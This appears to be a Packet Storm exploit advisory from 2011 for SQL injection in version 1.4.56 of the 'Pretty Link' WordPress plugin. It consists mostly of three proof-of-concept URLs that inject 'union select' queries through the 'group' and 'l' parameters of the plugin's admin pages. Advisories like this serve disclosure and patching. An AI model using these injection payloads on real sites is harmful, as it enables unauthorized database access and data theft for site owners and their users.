WordPress Pretty Link Like 1.4.56 SQL Injection

2011-06-2700:00:00

MaKyOtOx

packetstormsecurity.com

JSON

`# Exploit Title: 'Pretty Link Like' WordPress Plugin 1.4.56 Multiple SQL  
Injection  
# Google Dork: N/A  
# Author: MaKyOtOx (special Pwet to ansx & Zizounette for #bitcoin)  
# Date: 27/06/2011  
# Software Link: http://wordpress.org/extend/plugins/pretty-link/  
# Version: 1.4.56 (not tested on previous versions)  
# Tested on: WhatEver OS  
# CVE : 0-Day  
  
  
PoC 1 :  
http://wpsite.com/wp-admin/admin.php?page=pretty-link/prli-clicks.php&group=-1union  
select @@version  
PoC 2 :  
http://wpsite.com/wp-admin/admin.php?page=pretty-link/prli-clicks.php&l=-1union  
select @@version  
PoC 3 :  
http://wpsite.com/wp-admin/admin.php?page=pretty-link/prli-links.php&group=-1union  
select @@version  
`

JSON